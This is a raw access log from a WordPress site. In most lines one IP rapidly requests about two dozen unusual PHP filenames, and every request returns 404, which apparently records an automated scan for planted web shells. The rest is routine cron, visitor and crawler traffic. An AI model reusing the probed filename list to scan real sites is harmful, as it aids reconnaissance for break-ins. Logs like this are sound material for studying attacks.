4.184.121.217 - - [23/Jul/2026:06:14:17 +0800] "GET /ww.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:17 +0800] "GET /bthil.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:18 +0800] "GET /fpwch.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:18 +0800] "GET /new.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:18 +0800] "GET /num.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:18 +0800] "GET /403.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:19 +0800] "GET /afodf.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:19 +0800] "GET /csa.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:19 +0800] "GET /ee.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:19 +0800] "GET /xyn.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:19 +0800] "GET /file1.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:20 +0800] "GET /red.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:20 +0800] "GET /link.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:20 +0800] "GET /wp-wpbak.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:20 +0800] "GET /nux.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:21 +0800] "GET /wp-Blogs.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:21 +0800] "GET /ingfo.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:21 +0800] "GET /sixxis.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:21 +0800] "GET /bsend.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:21 +0800] "GET /cddlr.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:22 +0800] "GET /celjc.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:22 +0800] "GET /byp7.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:22 +0800] "GET /prosell2.php HTTP/1.1" 404 27 "-" "-"
4.184.121.217 - - [23/Jul/2026:06:14:22 +0800] "GET /pros.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [23/Jul/2026:06:31:15 +0800] "POST /wp-cron.php?doing_wp_cron=1784759475.9178810119628906250000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
119.28.140.106 - - [23/Jul/2026:06:31:15 +0800] "GET / HTTP/1.1" 200 35068 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
220.181.108.156 - - [23/Jul/2026:06:31:22 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fclub%2F HTTP/1.1" 200 1103 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [23/Jul/2026:07:12:48 +0800] "POST /wp-cron.php?doing_wp_cron=1784761968.5135030746459960937500 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
